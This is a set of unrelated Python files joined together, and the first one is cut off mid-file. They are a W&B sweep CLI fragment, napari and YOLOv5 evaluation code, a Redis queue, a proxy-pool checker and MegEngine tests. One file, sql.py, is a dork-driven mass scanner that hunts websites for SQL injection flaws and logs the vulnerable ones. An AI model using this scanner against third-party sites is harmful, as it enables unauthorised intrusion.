@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project of the sweep.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity scope for the project.")
@click.option("--count", default=None, type=int, help="The max number of runs for this agent.")
@click.argument('sweep_id')
@display_error
def agent(ctx, project, entity, count, sweep_id):
if api.api_key is None:
termlog("Login to W&B to use the sweep agent feature")
ctx.invoke(login, no_offline=True)
wandb.termlog('Starting wandb agent 🕵️')
wandb_agent.run_agent(sweep_id, entity=entity, project=project, count=count)
# you can send local commands like so:
# agent_api.command({'type': 'run', 'program': 'train.py',
# 'args': ['--max_epochs=10']})
@cli.command(context_settings=CONTEXT, help="Run the W&B local sweep controller")
@click.option('--verbose', is_flag=True, default=False, help="Display verbose output")
@click.argument('sweep_id')
@display_error
def controller(verbose, sweep_id):
click.echo('Starting wandb controller...')
tuner = wandb_controller.controller(sweep_id)
tuner.run(verbose=verbose)
if __name__ == "__main__":
cli()
|
sql.py
|
# Date: 01/27/2021
# Author: Borneo Cyber
# Description: SQL checker
from .log import Log
from .search import Search
from .browser import Browser
from time import sleep, time
from .display import Display
from threading import Thread, RLock
from .const import max_time_to_wait, max_active_browsers
class SQL(object):
def __init__(self, dork, write_over):
self.links = []
self.dork = dork
self.browsers = []
self.search = None
self.lock = RLock()
self.is_alive = True
self.total_found = 0
self.active_links = []
self.display = Display()
self.log = Log(write_over)
def search_manager(self):
search = Search(self.dork)
self.search = search
Thread(target=self.search.start, daemon=True).start()
while self.is_alive:
if not self.search.is_active():
break
else:
link = self.search.get_link()
if link:
with self.lock:
self.links.append(link)
else:
sleep(0.5)
if self.is_alive:
self.is_alive = False
def link_manager(self):
is_started = False
while self.is_alive:
if not self.search:
sleep(1.5)
continue
if not self.search.links.qsize():
continue
browsers = []
for link in self.links:
if not link in self.active_links and len(self.active_links) < max_active_browsers:
self.active_links.append(link)
browser = Browser(link)
browsers.append(browser)
self.browsers.append(browser)
for browser in browsers:
if not is_started and self.is_alive:
self.display.info('Harap Tunggu Sedang Mencari Target Vulnerability ...\n')
is_started = True
if not self.is_alive:
break
t = Thread(target=browser.attempt)
t.daemon = True
t.start()
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if not browser.is_active:
if browser.is_attempted:
with self.lock:
if browser.link in self.links:
self.links.remove(browser.link)
if browser.is_vulner:
self.total_found += 1
self.log.write(browser.link)
self.display.is_vulner(browser.link)
else:
self.display.is_not_vulner(browser.link)
with self.lock:
self.active_links.remove(browser.link)
self.browsers.remove(browser)
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.is_active = False
def start(self):
try:
self.log.setup()
except KeyboardInterrupt:
self.stop()
except:
pass
if not self.is_alive:
return
self.display.info('Starting daemon threads ...')
link_manager = Thread(target=self.link_manager)
link_manager.daemon = True
link_manager.start()
search_manager = Thread(target=self.search_manager)
search_manager.daemon = True
search_manager.start()
self.browser_manager()
def stop(self):
if self.search:
self.search.stop()
self.is_alive = False
self.display.shutdown(self.total_found)
|
interactive.py
|
"""
Special module for defining an interactive tracker that uses napari to display fields
.. codeauthor:: David Zwicker <david.zwicker@ds.mpg.de>
"""
import logging
import multiprocessing as mp
import platform
import queue
import signal
import time
from typing import Any, Dict, Optional
from ..fields.base import FieldBase
from ..tools.docstrings import fill_in_docstring
from ..tools.plotting import napari_add_layers
from .base import InfoDict, TrackerBase
from .intervals import IntervalData
def napari_process(
data_channel: mp.Queue,
initial_data: Dict[str, Dict[str, Any]],
t_initial: float = None,
viewer_args: Dict[str, Any] = None,
):
""":mod:`multiprocessing.Process` running `napari <https://napari.org>`__
Args:
data_channel (:class:`multiprocessing.Queue`):
queue instance to receive data to view
initial_data (dict):
Initial data to be shown by napari. The layers are named according to
the keys in the dictionary. The associated value needs to be a tuple,
where the first item is a string indicating the type of the layer and
the second carries the associated data
t_initial (float):
Initial time
viewer_args (dict):
Additional arguments passed to the napari viewer
"""
logger = logging.getLogger(__name__ + ".napari_process")
try:
import napari
from napari.qt import thread_worker
except ModuleNotFoundError:
logger.error(
"The `napari` python module could not be found. This module needs to be "
"installed to use the interactive tracker."
)
return
logger.info("Start napari process")
# ignore keyboard interrupts in this process
signal.signal(signal.SIGINT, signal.SIG_IGN)
if viewer_args is None:
viewer_args = {}
# start napari Qt GUI
with napari.gui_qt():
# create and initialize the viewer
viewer = napari.Viewer(**viewer_args)
napari_add_layers(viewer, initial_data)
# add time if given
if t_initial is not None:
from qtpy.QtWidgets import QLabel
label = QLabel()
label.setText(f"Time: {t_initial}")
viewer.window.add_dock_widget(label)
else:
label = None
def check_signal(msg: Optional[str]):
"""helper function that processes messages by the listener thread"""
if msg is None:
return # do nothing
elif msg == "close":
viewer.close()
else:
raise RuntimeError(f"Unknown message from listener: {msg}")
@thread_worker(connect={"yielded": check_signal})
def update_listener():
"""helper thread that listens to the data_channel"""
logger.info("Start napari thread to receive data")
# infinite loop waiting for events in the queue
while True:
# get all items from the queue and display the last update
update_data = None # nothing to update yet
while True:
time.sleep(0.02) # read queue with 50 fps
try:
action, data = data_channel.get(block=False)
except queue.Empty:
break
if action == "close":
logger.info("Forced closing of napari...")
yield "close" # signal to napari process to shut down
break
elif action == "update":
update_data = data
# continue running until the queue is empty
else:
logger.warning(f"Unexpected action: {action}")
# update napari view when there is data
if update_data is not None:
logger.debug(f"Update napari layer...")
layer_data, t = update_data
if label is not None:
label.setText(f"Time: {t}")
for name, layer_data in layer_data.items():
viewer.layers[name].data = layer_data["data"]
yield
# start worker thread that listens to the data_channel
update_listener()
logger.info("Shutting down napari process")
class NapariViewer:
"""allows viewing and updating data in a separate napari process"""
def __init__(self, state: FieldBase, t_initial: float = None):
"""
Args:
state (:class:`pde.fields.base.FieldBase`): The initial state to be shown
t_initial (float): The initial time. If `None`, no time will be shown.
"""
self._logger = logging.getLogger(__name__)
# pick a suitable multiprocessing
if platform.system() == "Darwin":
context: mp.context.BaseContext = mp.get_context("spawn")
else:
context = mp.get_context()
# create process that runs napari
self.data_channel = context.Queue()
initial_data = state._get_napari_data()
viewer_args = {
"axis_labels": state.grid.axes,
"ndisplay": 3 if state.grid.dim >= 3 else 2,
}
args = (self.data_channel, initial_data, t_initial, viewer_args)
self.proc = context.Process(target=napari_process, args=args)
# start the process in the background
try:
self.proc.start()
except RuntimeError:
print()
print("=" * 80)
print(
"It looks as if the main program did not use the multiprocessing "
"safe-guard, which is necessary on some platforms. Please protect the "
"main code of your program in the following way:"
)
print("")
print(" if __name__ == '__main__':")
print(" code ...")
print("")
print("The interactive Napari viewer could not be launched.")
print("=" * 80)
print()
self._logger.exception("Could not launch napari process")
def update(self, state: FieldBase, t: float):
"""update the state in the napari viewer
Args:
state (:class:`pde.fields.base.FieldBase`): The new state
t (float): Current time
"""
if self.proc.is_alive():
try:
data = (state._get_napari_data(), t)
self.data_channel.put(("update", data), block=False)
except queue.Full:
pass # could not write data
else:
try:
self.data_channel.get(block=False)
except queue.Empty:
pass
def close(self, force: bool = True):
"""closes the napari process
Args:
force (bool):
Whether to force closing of the napari program. If this is `False`, this
method blocks until the user closes napari manually.
"""
if self.proc.is_alive() and force:
# signal to napari process that it should be closed
try:
self.data_channel.put(("close", None))
except RuntimeError:
pass
self.data_channel.close()
self.data_channel.join_thread()
if self.proc.is_alive():
self.proc.join()
class InteractivePlotTracker(TrackerBase):
"""Tracker showing the state interactively in napari
Note:
The interactive tracker uses the python :mod:`multiprocessing` module to run
`napari <http://napari.org/>`__ externally. The multiprocessing module
has limitations on some platforms, which requires some care when writing your
own programs. In particular, the main method needs to be safe-guarded so that
the main module can be imported again after spawning a new process. An
established pattern that works is to introduce a function `main` in your code,
which you call using the following pattern
.. code-block:: python
def main():
# here goes your main code
if __name__ == "__main__":
main()
The last two lines ensure that the `main` function is only called when the
module is run initially and not again when it is re-imported.
"""
name = "interactive"
@fill_in_docstring
def __init__(
self,
interval: IntervalData = "0:01",
close: bool = True,
show_time: bool = False,
):
"""
Args:
interval:
{ARG_TRACKER_INTERVAL}
close (bool):
Flag indicating whether the napari window is closed automatically at the
end of the simulation. If `False`, the tracker blocks when `finalize` is
called until the user closes napari manually.
show_time (bool):
Whether to indicate the time
"""
# initialize the tracker
super().__init__(interval=interval)
self.close = close
self.show_time = show_time
def initialize(self, state: FieldBase, info: InfoDict = None) -> float:
"""initialize the tracker with information about the simulation
Args:
field (:class:`~pde.fields.FieldBase`):
An example of the data that will be analyzed by the tracker
info (dict):
Extra information from the simulation
Returns:
float: The first time the tracker needs to handle data
"""
if self.show_time:
t_initial = 0 if info is None else info.get("t_start", 0)
else:
t_initial = None
self._viewer = NapariViewer(state, t_initial=t_initial)
return super().initialize(state, info=info)
def handle(self, state: FieldBase, t: float) -> None:
"""handle data supplied to this tracker
Args:
field (:class:`~pde.fields.FieldBase`):
The current state of the simulation
t (float):
The associated time
"""
self._viewer.update(state, t)
def finalize(self, info: InfoDict = None) -> None:
"""finalize the tracker, supplying additional information
Args:
info (dict):
Extra information from the simulation
"""
self._viewer.close(force=self.close)
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
queue.py
|
import json
import logging
import os
import threading
import time
# import gevent
import redis as Redis
from gevent import monkey
from rx import Observable
monkey.patch_all()
logger = logging.getLogger(__name__)
REDIS_URL = os.environ.get('REDIS_URL') or 'redis://localhost:6379'
REDIS_CHAN_MESSAGES = 'messages' # Todo use one redis channel per channel?
redis_client = Redis.from_url(REDIS_URL)
class RedisPubsubObservable:
def __init__(self, redis_url, redis_channel):
self._redis_url = redis_url
self._redis_channel = redis_channel
self._observable = None
def _connect(self):
"""Make sure connection is not shared across gevent thread thingies
"""
# return Redis.from_url(self._redis_url)
assert self._redis_url == REDIS_URL
return redis_client
def publish(self, data):
redis = self._connect()
redis.publish(self._redis_channel, json.dumps(data))
def get_observable(self):
logger.debug('GET OBSERVABLE [chan: {}]'
.format(self._redis_channel))
if not self._observable:
logger.debug('Create new observable')
self._observable = self.create_observable()
return self._observable
def create_observable(self):
# items = self.watch()
# return Observable.from_iterable(items)
def listen_to_redis_async(observable):
logger.debug('===> Starting Redis SUBSCRIBE thread')
def thread_callback():
logger.debug('THREAD CALLBACK STARTED')
redis = self._connect()
pubsub = redis.pubsub()
pubsub.subscribe(self._redis_channel)
for m in pubsub.listen():
if m['type'] != 'message':
logger.debug('<<< Redis pub/sub CTL: %s', repr(m))
continue
logger.debug('<<< Redis pub/sub MSG: %s', repr(m))
data = json.loads(m['data'])
observable.on_next(data)
logger.debug('>>> Redis pub/sub sent: %s', repr(data))
logger.debug('THREAD CALLBACK FINISHED')
t = threading.Thread(target=thread_callback)
t.setDaemon(True)
t.start()
# NOTE: the function will be called for every new subscriber,
# creating more and more threads listening to Redis.
# We actually want to somehow share events coming from the *one*
# thread attached to Redis...
obs = Observable.create(listen_to_redis_async)
obs = obs.publish()
obs.connect()
return obs
messages_queue = RedisPubsubObservable(REDIS_URL, REDIS_CHAN_MESSAGES)
def send_message(message):
messages_queue.publish({
'id': message.id,
# 'timestamp': message.timestamp,
# 'user_id': message.user_id,
'channel': message.channel,
'text': message.text,
})
def get_watch_observable(channel):
return (
messages_queue
.get_observable()
.filter(lambda msg: msg['channel'] == channel))
|
t4.py
|
import time
from threading import Thread
def sleepMe(i):
print("Thread %i gonna to sleep for 8 seconds." % i)
time.sleep(8)
print("Thread %i woke up." % i)
for i in range(10):
th = Thread(target=sleepMe, args=(i, ))
th.start()
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
#实现异步检测
async def test_single_proxy(self, proxy):
"""
text one proxy, if valid, put them to usable_proxies.
"""
try:
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
aio test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter() #从各大代理网站抓取的类
def is_over_threshold(self):
"""
judge if count is overflow.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod
def valid_proxy(cycle=VALID_CHECK_CYCLE):
"""
Get half of proxies which in redis
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
If the number of proxies less than lower_threshold, add proxy
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running') #
valid_process = Process(target=Schedule.valid_proxy) #网上筛选
check_process = Process(target=Schedule.check_pool) #监测有效性
valid_process.start()
check_process.start()
|
test_util.py
|
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
from time import sleep
import pytest
import megengine as mge
import megengine._internal as mgb
import megengine.distributed as dist
_LOCALHOST = "127.0.0.1"
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
def _init_process_group_wrapper(world_size, rank, dev, backend, q):
if rank == 0:
dist.init_process_group(_LOCALHOST, 0, world_size, rank, dev, backend)
q.put(dist.get_master_port())
else:
port = q.get()
dist.init_process_group(_LOCALHOST, port, world_size, rank, dev, backend)
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_create_mm_server():
def worker():
if not mge.is_cuda_available():
return
port = mgb.config.create_mm_server("0.0.0.0", 0)
assert port > 0
res = mgb.config.create_mm_server("0.0.0.0", port)
assert res == -1
p = mp.Process(target=worker)
p.start()
p.join(10)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
def worker(rank, backend, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
assert dist.is_distributed() == True
assert dist.get_master_ip() == _LOCALHOST
assert dist.get_master_port() > 0
assert dist.get_world_size() == world_size
assert dist.get_rank() == rank
assert dist.get_backend() == backend
def check(backend):
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, backend, Q))
p1 = mp.Process(target=worker, args=(1, backend, Q))
p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
check("nccl")
check("ucx")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
ip = "127.0.0.1"
backend = "nccl"
def worker(rank, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, Q))
p1 = mp.Process(target=worker, args=(1, Q))
